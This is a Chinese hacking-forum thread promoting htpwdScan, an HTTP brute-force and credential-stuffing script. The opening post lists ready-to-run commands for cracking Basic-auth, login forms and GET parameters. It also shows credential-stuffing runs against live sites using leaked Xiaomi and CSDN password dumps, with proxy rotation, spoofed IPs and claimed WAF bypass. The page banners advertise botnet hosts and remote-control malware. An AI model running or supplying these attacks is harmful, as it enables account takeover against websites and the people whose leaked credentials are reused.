开启邀请码注册中,禁止灌水!发现一次永久禁言

墨客安全网

 找回密码
 立即注册

墨客安全网-新手入门指南 常见问题及帮助 | 做任务赚墨币币 新人报道 | 悬赏问答| 墨币充值| 帖子举报

墨客安全网-论坛精华合集 墨客安全网 -精华合集 之 速成之路 原创精品 | 加入墨客Vip | Vip工具| Vip教程

墨客安全网-进阶技术学习区 软件/工具| 社工专区 | 入侵检测| 技术文章 动画教程 | 编程交流| 免杀更新 | 程序源码

[悬赏公告] - 严查灌水,打造一个无水论坛,从即日起.请大家互相监督,发现恶意灌水的,请发贴举报,核实后会给予5-10的墨币奖励。
[官方公告] 从今日起所有会员发布工具必须到审核板块进行审核,如有违反永久禁言处理!
 [招聘招聘]-招聘各方面给力版主,要求每日发帖不少于3贴,每天在线时间6个小时以上,具体福利和待遇联系TG客服或者在线管理员
[官方公告]1.发现网盘下载地址失效!可以发贴举报 审核证实后给予奖励10-20墨币。2.即日起!不管是谁发贴!都不能带QQ群 已及个人QQ。个人网站,发现后严格处理。[官方业务]-加入墨客安全网Vip,圆你日抓千鸡梦,各种精品教程,免杀远控,压力测试等你拿,期待各位会员的加入,即可享受众多福利!
【官方公告】论坛所有广告均为商业行为,需要交易的请尽量走担保程序,所有因广告产生的任何纠纷请私下解决【站外广告】大量收色刷!刷单肉鸡!带飞机肉鸡!寻内网横向技术!懂的来,小白勿扰!长期包养色刷,刷单,带飞机海外盘国内盘灰产肉鸡稳定鸡商
联系飞机:@seeok91
【官方业务】精品广告位招租,需要请联系官方TG客服【官方业务】精品广告位招租,需要请联系官方TG客服【官方业务】精品广告位招租,需要请联系官方TG客服
查看: 659|回复: 9

[扫描爆破(已审核)] 一个简单的HTTP暴力破解、撞库攻击脚本

[复制链接]
  • TA的每日心情
    开心
    2018-5-28 10:59
  • 签到天数: 5 天

    连续签到: 1 天

    [LV.2]偶尔看看I

    37

    主题

    206

    回帖

    1087

    积分

    UID
    89
    威望
    132 (点)
    主题
    37 (帖)
    精华
    0 (帖)
    贡献
    10  (次)
    墨币
    570  (枚)
    活跃
    86  (点)
    担保币
    0  (枚)
    注册时间
    2015-7-6
    最后登录
    2018-5-28

    论坛元老热心会员活跃会员突出贡献优秀版主灌水之王最佳新人

    发表于 2015-7-12 20:52:14 | 显示全部楼层 |阅读模式
    回复下载地址:
    游客,如果您要查看本帖隐藏内容请回复

    htpwdScan 是一个简单的HTTP暴力破解、撞库攻击脚本. 它的特性:
    • 支持批量校验并导入HTTP代理,低频撞库可以成功攻击大部分网站,绕过大部分防御策略和waf
    • 支持直接导入互联网上泄露的社工库,发起撞库攻击
    • 支持导入超大字典
    简单示例
    • HTTP Basic认证
      htpwdScan.py -u=http://auth.58.com/ -basic user.txt password.txt
      导入用户名密码字典即可
    • 表单破解
      htpwdScan.py -f post2.txt -d user=user.txt passwd=password.txt -err="success\":false"
      从 post2.txt 导入抓的http包,user和passwd是需要破解的参数,而 user.txt password.txt 是保存了密码的字典文件
      success":false 是选择的失败标记,标记中若有双引号,请记得用右斜杠 \ 转义
    • GET参数破解
      htpwdScan.py -d passwd=password.txt -u="http://xxx.com/index.php?m=login&username=test&passwd=test" -get -err="success\":false"
      使用-get参数告诉脚本此处是GET请求
    • 撞库攻击
      htpwdScan.py -f=post.txt -database loginname,passwd=xiaomi.txt -regex="(\S+)\s+(\S+)" -err="用户名或密码错误" -fip
      htpwdScan.py -f=post.txt -database passwd,loginname=csdn.net.sql -regex="\S+ # (\S+) # (\S+)" -err="用户名或密码错误" -fip
      使用小米和csdn库发起撞库攻击。post.txt是抓包的HTTP请求
      参数-regex设定从文件提取参数的正则表达式,此处需分组,分组的方式是使用括号()
      小米的数据行格式是 [email protected] xxxxxxx 也即 (用户名)空白字符(密码)
      (\S+)\s+(\S+) 可指定第一个非空白字符拿去填充loginname,而第二个非空白字符串拿去填充passwd
      csdn的数据行格式是zdg # 12344321 # [email protected] . 正则表达式写作\S+ # (\S+) # (\S+)
      第一个#后面的非空白字符串填充passwd,第二个#后面的非空白字符串填充loginname
      请注意,参数的顺序是重要的
      -fip 是启用伪造随机IP
    • 校验HTTP代理
      htpwdScan.py -f=post.txt -proxylist=proxies.txt -checkproxy -suc="用户名或密码错误"
      要破解某个网站,批量测试使用代理是否连通目标网站,把HTTP请求保存到post.txt,然后用-suc参数设定连通标记
      一个简单可行的校验方式是:
      htpwdScan.py -u=http://www.baidu.com -get -proxylist=available.txt -checkproxy -suc="百度一下"

    完整参数说明
    脚本支持的小功能较多,请耐心阅读以下完整说明。建议多使用 -debug 参数查看HTTP请求是否有问题,没问题再发起真正的破解。
    usage: htpwdScan.py [options]* An HTTP weak pass scanner. By LiJieJie *optional arguments:  -h, --help            显示帮助Target:  -u REQUESTURL         设定目标URL, 示例.                        -u="https://www.test.com/login.php"  -f REQUESTFILE        从文件导入HTTP请求  -https                当从文件导入HTTP请求时,启用https(SSL)  -get                  使用GET方法,默认: POST  -basic  [ ...]        HTTP Basic 暴力破解.                        示例. -basic users.dic pass.dicDictionary:  -d Param=DictFile [Param=DictFile ...]                        为参数设定字典文件,                        支持哈希函数如 md5, md5_16, sha1.                        示例. -d user=users.dic pass=md5(pass.dic)Detect:  -no302                无视302跳转, 默认302敏感  -err ERR [ERR ...]    响应文本的破解失败标记,                        示例. -err "user not exist" "password wrong"  -suc SUC [SUC ...]    响应文本中的破解成功标记,                        e.g. -suc "welcome," "admin"  -herr HERR            响应HTTP头的破解失败标记  -hsuc HSUC            响应HTTP头的破解成功标记  -rtxt RetryText       响应文本中的重试标记,出现则重试请求,                        示例. -rtxt="IP blocked"  -rntxt RetryNoText    响应文本中的重试标记,未出现则重试请求,                        示例. -rntxt="<body>"  -rheader RetryHeader  响应头中的重试标记,出现则重试请求,                        示例. -rheader="Set-Cookie:"  -rnheader RetryNoHeader                        响应头中的重试标记,未出现则重试请求,                        示例. -rheader="HTTP/1.1 200 OK"Proxy and spoof:  -proxy Server:Port    设定少量HTTP代理                        示例. -proxy=127.0.0.1:8000,8.8.8.8:8000  -proxylist ProxyListFile                        从文件批量导入HTTP代理,                        示例. -proxylist=proxys.txt  -checkproxy           检查代理服务器的可用性.                        可用代理输出到 001.proxy.servers.txt  -fip                  生成随机X-Forwarded-For欺骗源IP  -fsid FSID            生成随机session ID. 示例. -fsid PHPSESSID  -sleep SECONDS        每次HTTP结束,等待SECONDS秒,                        避免IP被临时屏蔽,进入黑名单Database attack:  -database DATABASE    导入社工库中的数据.                        示例. -database user,pass=csdn.txt  -regex REGEX          从社工库中提取数据的正则表达式,必须分组.                        示例. -regex="(\S+)\s+(\S+)"General:  -t THREADS            工作线程数,默认50  -o OUTPUT             输出文件.  默认: 000.Cracked.Passwords.txt  -debug                进入debug模式检查HTTP请求和HTTP响应  -nov                  只显示破解成功的条目,不显示进度  -v                    show program's version number and exi

    2015042318240062089.png

    新人必看帖,如何快速赚取墨币,了解墨客安全网论坛版规,等等...( 点我查看

    如果你在论坛悬赏问答求助问题,并且已经从坛友或者管理的回复中解决了问题,请在帖子内点击(已解决)

    发帖求助前要善用 论坛搜索 功能,如果搜不到可以试试,论坛顶上的 百度站内搜索 - 纵横站内搜索 那里可能会有你要找的答案;

    如果发现论坛有灌水帖、下载地址失效帖、后门帖、广告帖、工具不能正常使用、都可以去 举报版块 发帖举报,核实给予退回墨币+额外的墨币奖励哦;
  • TA的每日心情

    2018-5-10 20:57
  • 签到天数: 5 天

    连续签到: 1 天

    [LV.2]偶尔看看I

    2

    主题

    233

    回帖

    427

    积分

    UID
    150
    威望
    74 (点)
    主题
    2 (帖)
    精华
    0 (帖)
    贡献
    16  (次)
    墨币
    26  (枚)
    活跃
    66  (点)
    担保币
    0  (枚)
    注册时间
    2015-7-8
    最后登录
    2018-5-10
    发表于 2015-7-12 22:14:08 | 显示全部楼层
    新人必看帖,如何快速赚取墨币,了解墨客安全网论坛版规,等等...( 点我查看

    如果你在论坛悬赏问答求助问题,并且已经从坛友或者管理的回复中解决了问题,请在帖子内点击(已解决)

    发帖求助前要善用 论坛搜索 功能,如果搜不到可以试试,论坛顶上的 百度站内搜索 - 纵横站内搜索 那里可能会有你要找的答案;

    如果发现论坛有灌水帖、下载地址失效帖、后门帖、广告帖、工具不能正常使用、都可以去 举报版块 发帖举报,核实给予退回墨币+额外的墨币奖励哦;
  • TA的每日心情

    2018-3-24 23:31
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    11

    主题

    220

    回帖

    736

    积分

    UID
    18
    威望
    189 (点)
    主题
    11 (帖)
    精华
    0 (帖)
    贡献
    9  (次)
    墨币
    116  (枚)
    活跃
    101  (点)
    担保币
    0  (枚)
    注册时间
    2015-6-13
    最后登录
    2018-3-24
    发表于 2015-7-13 13:12:50 | 显示全部楼层
    新人必看帖,如何快速赚取墨币,了解墨客安全网论坛版规,等等...( 点我查看

    如果你在论坛悬赏问答求助问题,并且已经从坛友或者管理的回复中解决了问题,请在帖子内点击(已解决)

    发帖求助前要善用 论坛搜索 功能,如果搜不到可以试试,论坛顶上的 百度站内搜索 - 纵横站内搜索 那里可能会有你要找的答案;

    如果发现论坛有灌水帖、下载地址失效帖、后门帖、广告帖、工具不能正常使用、都可以去 举报版块 发帖举报,核实给予退回墨币+额外的墨币奖励哦;
  • TA的每日心情
    开心
    2018-4-22 08:03
  • 签到天数: 51 天

    连续签到: 2 天

    [LV.5]常住居民I

    47

    主题

    938

    回帖

    6300

    积分

    UID
    60
    威望
    1621 (点)
    主题
    47 (帖)
    精华
    4 (帖)
    贡献
    108  (次)
    墨币
    1945  (枚)
    活跃
    1000  (点)
    担保币
    0  (枚)
    注册时间
    2015-7-5
    最后登录
    2018-6-7

    最佳新人热心会员灌水之王突出贡献荣誉管理论坛元老兄弟义气音乐大师

    发表于 2015-7-15 00:27:23 | 显示全部楼层
    新人必看帖,如何快速赚取墨币,了解墨客安全网论坛版规,等等...( 点我查看

    如果你在论坛悬赏问答求助问题,并且已经从坛友或者管理的回复中解决了问题,请在帖子内点击(已解决)

    发帖求助前要善用 论坛搜索 功能,如果搜不到可以试试,论坛顶上的 百度站内搜索 - 纵横站内搜索 那里可能会有你要找的答案;

    如果发现论坛有灌水帖、下载地址失效帖、后门帖、广告帖、工具不能正常使用、都可以去 举报版块 发帖举报,核实给予退回墨币+额外的墨币奖励哦;

    该用户从未签到

    2

    主题

    103

    回帖

    434

    积分

    UID
    241
    威望
    39 (点)
    主题
    2 (帖)
    精华
    0 (帖)
    贡献
    20  (次)
    墨币
    229  (枚)
    活跃
    72  (点)
    担保币
    0  (枚)
    注册时间
    2015-7-11
    最后登录
    2016-8-20
    发表于 2015-7-19 11:40:10 | 显示全部楼层
    新人必看帖,如何快速赚取墨币,了解墨客安全网论坛版规,等等...( 点我查看

    如果你在论坛悬赏问答求助问题,并且已经从坛友或者管理的回复中解决了问题,请在帖子内点击(已解决)

    发帖求助前要善用 论坛搜索 功能,如果搜不到可以试试,论坛顶上的 百度站内搜索 - 纵横站内搜索 那里可能会有你要找的答案;

    如果发现论坛有灌水帖、下载地址失效帖、后门帖、广告帖、工具不能正常使用、都可以去 举报版块 发帖举报,核实给予退回墨币+额外的墨币奖励哦;

    该用户从未签到

    6

    主题

    205

    回帖

    1494

    积分

    UID
    1518
    威望
    150 (点)
    主题
    6 (帖)
    精华
    0 (帖)
    贡献
    34  (次)
    墨币
    949  (枚)
    活跃
    213  (点)
    担保币
    0  (枚)
    注册时间
    2015-11-7
    最后登录
    2024-11-22
    发表于 2017-1-9 02:00:30 | 显示全部楼层
    新人必看帖,如何快速赚取墨币,了解墨客安全网论坛版规,等等...( 点我查看

    如果你在论坛悬赏问答求助问题,并且已经从坛友或者管理的回复中解决了问题,请在帖子内点击(已解决)

    发帖求助前要善用 论坛搜索 功能,如果搜不到可以试试,论坛顶上的 百度站内搜索 - 纵横站内搜索 那里可能会有你要找的答案;

    如果发现论坛有灌水帖、下载地址失效帖、后门帖、广告帖、工具不能正常使用、都可以去 举报版块 发帖举报,核实给予退回墨币+额外的墨币奖励哦;
  • TA的每日心情
    奋斗
    2018-6-6 11:43
  • 签到天数: 53 天

    连续签到: 1 天

    [LV.5]常住居民I

    4

    主题

    229

    回帖

    902

    积分

    UID
    6831
    威望
    228 (点)
    主题
    4 (帖)
    精华
    1 (帖)
    贡献
    2  (次)
    墨币
    206  (枚)
    活跃
    141  (点)
    担保币
    0  (枚)
    注册时间
    2016-3-9
    最后登录
    2018-6-6
    QQ
    发表于 2017-8-9 21:31:13 | 显示全部楼层
    新人必看帖,如何快速赚取墨币,了解墨客安全网论坛版规,等等...( 点我查看

    如果你在论坛悬赏问答求助问题,并且已经从坛友或者管理的回复中解决了问题,请在帖子内点击(已解决)

    发帖求助前要善用 论坛搜索 功能,如果搜不到可以试试,论坛顶上的 百度站内搜索 - 纵横站内搜索 那里可能会有你要找的答案;

    如果发现论坛有灌水帖、下载地址失效帖、后门帖、广告帖、工具不能正常使用、都可以去 举报版块 发帖举报,核实给予退回墨币+额外的墨币奖励哦;
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    1、请认真发帖,禁止回复纯表情,纯数字等无意义的内容!帖子内容不要太简单!
    2、提倡文明上网,净化网络环境!抵制低俗不良违法有害信息。
    3、每个贴内连续回复请勿多余3贴,每个版面回复请勿多余10贴!
    4、如果你对主帖作者的帖子不屑一顾的话,请勿回帖。谢谢合作!

    关闭

    站长推荐上一条 /1 下一条